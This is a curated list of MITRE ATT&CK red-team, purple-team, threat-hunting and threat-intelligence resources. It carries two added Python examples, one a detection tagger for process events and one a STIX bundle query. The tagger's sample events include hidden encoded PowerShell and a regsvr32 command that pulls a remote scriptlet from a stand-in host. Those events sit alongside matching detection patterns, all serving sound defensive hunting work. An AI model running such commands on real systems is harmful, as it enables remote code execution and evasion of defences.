Awesome Mitre ATT&CK™ Framework
A curated list of awesome resources related to the MITRE ATT&CK™ Framework
Red and Purple Team
Resources
- MITRE ATT&CK™ Evaluations Round 1 - APT3
- Getting Started with ATT&CK: Adversary Emulation and Red Teaming
- Adversary Emulation Plans
- The Threat Emulation Problem
- Why we love threat emulation exercises (and how to get started with one of your own)
- MITRE ATT&CKcon 2018: From Automation to Analytics: Simulating the Adversary to Create Better Detections, David Herrald and Ryan Kovar, Splunk
- Living Off The Land Binaries and Scripts (and also Libraries)
- Purple Teaming with Vectr, Cobalt Strike, and MITRE ATT&CK
- Red Team Use of MITRE ATT&CK
- Purple Teaming with ATT&CK - x33fcon 2018
- Live Adversary Simulation: Red and Blue Team Tactics
- MITRE ATT&CKcon 2018: Playing Devil’s Advocate to Security Initiatives with ATT&CK, David Middlehurst, Trustwave
- MITRE ATT&CKcon 2018: From Red VS Blue to Red ♥ Blue, Olaf Hartong and Vincent Van Mieghem, Deloitte
- PowerShell for Practical Purple Teaming
- Signal the ATT&CK: Part 1
- Signal the ATT&CK: Part 2
Tools
Red Team
- Cobalt Strike - Software for Adversary Simulations and Red Team Operations
- PoshC2 - PoshC2 is a proxy aware C2 framework that utilises Powershell and/or equivalent (System.Management.Automation.dll) to aid penetration testers with red teaming, post-exploitation and lateral movement.
- Empire - Post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent.
- PowerSploit - Collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment.
- Invoke-PSImage - Invoke-PSImage takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image.
Purple Team
- RE:TERNAL - RE:TERNAL is a centralised purple team simulation platform. Reternal uses agents installed on a simulation network to execute various known red-teaming techniques in order to test blue-teaming capabilities.
- Purple Team ATT&CK Automation - Praetorian's public release of our Metasploit automation of MITRE ATT&CK™ TTPs
- VECTR - VECTR is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios
- Mordor - The Mordor project provides pre-recorded security events generated by simulated adversarial techniques in the form of JavaScript Object Notation (JSON) files for easy consumption.
Adversary Emulation
- MITRE CALDERA - CALDERA is an automated adversary emulation system, built on the MITRE ATT&CK™ framework.
- Atomic Red Team - Small and highly portable detection tests based on MITRE's ATT&CK.
- Metta - An information security preparedness tool to do adversarial simulation.
- Red Team Automation (RTA) - RTA provides a framework of scripts designed to allow blue teams to test their detection capabilities against malicious tradecraft, modeled after MITRE ATT&CK.
Threat Hunting
Resources
- MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, SpecterOps and Jose Luis Rodriguez, Student
- Testing the Top MITRE ATT&CK Techniques: PowerShell, Scripting, Regsvr32
- Ten Ways Zeek Can Help You Detect the TTPs of MITRE ATT&CK
- SEC1244 - Cops and Robbers: Simulating the Adversary to Test Your Splunk Security Analytics
- Mapping your Blue Team to MITRE ATT&CK™
- Quantify Your Hunt: Not Your Parent’s Red Teaming Redux
- Post-Exploitation Hunting with ATT&CK & Elastic
- ThreatHunter-Playbook
- How MITRE ATT&CK helps security operations
- MITRE Cyber Analytics Repository
- MITRE ATT&CK Windows Logging Cheat Sheets
- Defensive Gap Assessment with MITRE ATT&CK
- Prioritizing the Remediation of Mitre ATT&CK Framework Gaps
- Finding Related ATT&CK Techniques
- Getting Started with ATT&CK: Detection and Analytics
- 2019 Threat Detection Report
- A Process is No One : Hunting for Token Manipulation
Tools
- osquery-attck - Mapping the MITRE ATT&CK Matrix with Osquery
- ATTACKdatamap - A data source assessment at the event level to show potential coverage of the MITRE ATT&CK framework
- Splunk Mitre ATT&CK App - A Splunk app mapped to MITRE ATT&CK to guide your threat hunts
- auditd-attack - A Linux Auditd rule set mapped to MITRE's Attack Framework
- DeTTACT - DeTT&CT aims to assist blue teams using ATT&CK to score and compare data log source quality, visibility coverage, detection coverage and threat actor behaviours.
- HELK - A Hunting ELK (Elasticsearch, Logstash, Kibana) with advanced analytic capabilities.
- Sigma - Generic Signature Format for SIEM Systems
- atomic-threat-coverage - Automatically generated actionable analytics designed to combat threats based on MITRE's ATT&CK.
- CyberMenace - A one stop shop hunting app in Splunk that can ingest Zeek, Suricata, Sysmon, and Windows event data to find malicious indicators of compromise relating to the MITRE ATT&CK Matrix.
- Wayfinder - Artificial Intelligence Agent to extract threat intelligence TTPs from feeds of malicious and benign event sources and automate threat hunting activities.
- pyattck - A Python package to interact with the MITRE ATT&CK Framework (documentation is published separately)
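Several of the hunting tools above (auditd-attack, osquery-attck, atomic-threat-coverage, the Windows logging cheat sheets) boil down to the same step: take an event, decide which ATT&CK technique it evidences, and count what your telemetry actually sees. The following is an added example of that step, not code from any project on this list. It runs three rules for the techniques named in "Testing the Top MITRE ATT&CK Techniques: PowerShell, Scripting, Regsvr32" over a handful of constructed Sysmon Event ID 1 / Windows 4688-style process-creation records. The technique IDs are the pre-sub-technique ATT&CK IDs that were current when this list was compiled (T1086 PowerShell, T1064 Scripting, T1117 Regsvr32); the events, paths and URL are made up for the example.

```python
"""Tag process-creation events with ATT&CK technique IDs and summarise coverage.

Added example; the events below are constructed (Sysmon EID 1 / 4688 shape) and
the technique IDs are the pre-sub-technique ATT&CK IDs in use when the list was
written (T1086 PowerShell, T1064 Scripting, T1117 Regsvr32).
"""
import re
from collections import defaultdict

# Constructed sample events.  Real telemetry carries many more fields; only the
# ones the rules consult are included here.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAo...",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript.exe C:\Users\Public\update.vbs",
     "ParentImage": r"C:\Windows\explorer.exe"},
    # Benign regsvr32 use by an installer: no remote scriptlet, no scrobj.dll.
    {"Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll",
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def _basename(path):
    """Last path component, lower-cased, for Windows-style paths."""
    return path.rsplit("\\", 1)[-1].lower()


# -e / -ec / -enc / -EncodedCommand followed by a payload.
ENCODED_PS = re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+\S+")
# regsvr32 /i: pointing at a remote scriptlet (the "Squiblydoo" pattern).
REMOTE_SCT = re.compile(r"(?i)/i:\s*(https?|ftp)://")

# Each rule: (technique_id, technique_name, predicate over one event).
RULES = [
    ("T1086", "PowerShell",
     lambda ev: _basename(ev["Image"]) in ("powershell.exe", "pwsh.exe")
     and bool(ENCODED_PS.search(ev["CommandLine"]))),
    ("T1117", "Regsvr32",
     lambda ev: _basename(ev["Image"]) == "regsvr32.exe"
     and (bool(REMOTE_SCT.search(ev["CommandLine"]))
          or "scrobj.dll" in ev["CommandLine"].lower())),
    ("T1064", "Scripting",
     lambda ev: _basename(ev["Image"]) in ("wscript.exe", "cscript.exe")),
]


def tag_event(event):
    """Return the list of (technique_id, name) tuples whose rule matches."""
    return [(tid, name) for tid, name, pred in RULES if pred(event)]


def technique_summary(events):
    """Map technique_id -> number of matching events.

    Events no rule matched are counted under 'untagged' so that visibility
    gaps stay in the report instead of silently disappearing.
    """
    counts = defaultdict(int)
    for ev in events:
        hits = tag_event(ev)
        if not hits:
            counts["untagged"] += 1
        for tid, _ in hits:
            counts[tid] += 1
    return dict(counts)


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(_basename(ev["Image"]), "->", [t for t, _ in tag_event(ev)] or "-")
    print(technique_summary(SAMPLE_EVENTS))
```

The fourth record is there on purpose: a bare `regsvr32 /s <local dll>` from an installer is everyday activity, so a rule keyed only on the image name would flood the hunt with noise. Keying on the remote `/i:` argument or the `scrobj.dll` handler keeps the T1117 signal while letting the benign registration fall through to `untagged`, which is exactly the kind of per-technique visibility check DeTT&CT and atomic-threat-coverage are built around.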
Threat Intelligence
Resources
- FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
- Getting Started with ATT&CK: Threat Intelligence
- Using ATT&CK to Advance Cyber Threat Intelligence — Part 1
- Using ATT&CK to Advance Cyber Threat Intelligence — Part 2
- ATT&CKing the Status Quo: ThreatBased Adversary Emulation with MITRE ATT&CK™
Tools
- cti - Cyber Threat Intelligence Repository expressed in STIX 2.0
- TALR - A public repository for the collection and sharing of detection rules in STIX format.
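The cti repository publishes ATT&CK itself as STIX 2.0: techniques are `attack-pattern` objects whose `kill_chain_phases` give the tactic and whose `external_references` carry the T-number, groups are `intrusion-set` objects, and "group X uses technique Y" is a `relationship` of type `uses`. The example below, added here and not code from the cti project, walks a bundle in that shape to answer the two questions the "Using ATT&CK to Advance Cyber Threat Intelligence" posts start from: which techniques sit under which tactic, and which techniques a named group is reported to use. The bundle is a constructed, cut-down stand-in with the same object types and field names as the real data (the real `enterprise-attack.json` is tens of megabytes, with UUID-suffixed IDs and many more fields); the group entry is modelled on APT3 but its contents here are illustrative.

```python
"""Query an ATT&CK-style STIX 2.0 bundle for tactic/technique and group/technique links.

Added example, not code from MITRE's cti repository.  BUNDLE_JSON is a
constructed stand-in using the same object types and field names as the
published enterprise-attack bundle.
"""
import json
from collections import defaultdict

BUNDLE_JSON = r"""
{
  "type": "bundle",
  "id": "bundle--example",
  "spec_version": "2.0",
  "objects": [
    {"type": "attack-pattern", "id": "attack-pattern--ps", "name": "PowerShell",
     "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}],
     "external_references": [{"source_name": "mitre-attack", "external_id": "T1086",
                              "url": "https://attack.mitre.org/techniques/T1086"}],
     "x_mitre_platforms": ["Windows"]},
    {"type": "attack-pattern", "id": "attack-pattern--regsvr32", "name": "Regsvr32",
     "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"},
                           {"kill_chain_name": "mitre-attack", "phase_name": "execution"}],
     "external_references": [{"source_name": "mitre-attack", "external_id": "T1117"}]},
    {"type": "attack-pattern", "id": "attack-pattern--old", "name": "Old Technique",
     "revoked": true,
     "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}],
     "external_references": [{"source_name": "mitre-attack", "external_id": "T0000"}]},
    {"type": "intrusion-set", "id": "intrusion-set--apt3", "name": "APT3",
     "aliases": ["APT3", "Gothic Panda", "UPS Team"],
     "external_references": [{"source_name": "mitre-attack", "external_id": "G0022"}]},
    {"type": "relationship", "id": "relationship--1", "relationship_type": "uses",
     "source_ref": "intrusion-set--apt3", "target_ref": "attack-pattern--ps"},
    {"type": "relationship", "id": "relationship--2", "relationship_type": "uses",
     "source_ref": "intrusion-set--apt3", "target_ref": "attack-pattern--old"},
    {"type": "relationship", "id": "relationship--3", "relationship_type": "mitigates",
     "source_ref": "course-of-action--x", "target_ref": "attack-pattern--ps"}
  ]
}
"""


def attack_id(obj):
    """ATT&CK external ID (T####, G####, ...) of a STIX object, or None."""
    for ref in obj.get("external_references", []):
        if ref.get("source_name") == "mitre-attack":
            return ref.get("external_id")
    return None


def is_live(obj):
    """ATT&CK keeps revoked and deprecated objects in the bundle so that old
    references still resolve; skip them unless you are tracking history."""
    return not obj.get("revoked", False) and not obj.get("x_mitre_deprecated", False)


def load_bundle(text):
    """Index every object in the bundle by its STIX id."""
    bundle = json.loads(text)
    return {o["id"]: o for o in bundle["objects"]}


def techniques_by_tactic(objs):
    """Map tactic (kill-chain phase name) -> sorted list of technique IDs."""
    out = defaultdict(list)
    for o in objs.values():
        if o["type"] != "attack-pattern" or not is_live(o):
            continue
        for phase in o.get("kill_chain_phases", []):
            if phase.get("kill_chain_name") == "mitre-attack":
                out[phase["phase_name"]].append(attack_id(o))
    return {tactic: sorted(ids) for tactic, ids in out.items()}


def techniques_used_by(objs, group_name):
    """Sorted (technique_id, name) pairs linked to a group by a 'uses' relationship.

    The group may be given by its primary name or any alias.
    """
    group = next((o for o in objs.values()
                  if o["type"] == "intrusion-set"
                  and (o.get("name") == group_name or group_name in o.get("aliases", []))),
                 None)
    if group is None:
        return []
    used = []
    for o in objs.values():
        if (o["type"] == "relationship" and o.get("relationship_type") == "uses"
                and o["source_ref"] == group["id"]):
            target = objs.get(o["target_ref"])
            if target and target["type"] == "attack-pattern" and is_live(target):
                used.append((attack_id(target), target["name"]))
    return sorted(used)


if __name__ == "__main__":
    objs = load_bundle(BUNDLE_JSON)
    print(techniques_by_tactic(objs))
    print(techniques_used_by(objs, "Gothic Panda"))
```

Two details matter when you point this at the real bundle. Objects are looked up by STIX id, not by T-number, because relationships reference `attack-pattern--<uuid>` ids; and the `revoked` / `x_mitre_deprecated` filter is not optional: the published data retains superseded techniques, and an emulation plan or coverage map built without that filter will list techniques that no longer exist in the current matrix.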
Community
License
To the extent possible under law, Rahmat Nurfauzi "@infosecn1nja" has waived all copyright and related or neighboring rights to this work.